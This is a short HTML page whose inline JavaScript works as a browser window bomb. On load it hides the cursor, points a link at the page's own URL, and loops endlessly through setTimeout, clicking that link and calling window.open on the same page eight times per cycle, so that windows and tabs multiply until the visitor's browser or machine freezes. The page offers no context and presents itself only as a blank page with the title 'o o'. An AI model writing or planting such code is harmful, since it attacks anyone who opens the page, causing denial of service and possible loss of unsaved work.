<style>
body{
	background-color: black;
	cursor: none;
}
</style>

<a id="e" href="https://www.google.com/" target="_blank" style="color: white">a</a>

<title>o o</title>

<script>
document.getElementById("e").href = window.location.href;

window.open(location.href, "e", "e", "e");

//window.open(location.href, location.href, "");

function e() {
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	document.getElementById("e").click();
	setTimeout(q, 0);
	
	window.minimize();
	
	//window.location.href
}

function q() {
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	window.open(location.href, "e", "e", "e");
	
	window.minimize();
	setTimeout(e, 0);
}

e();
</script>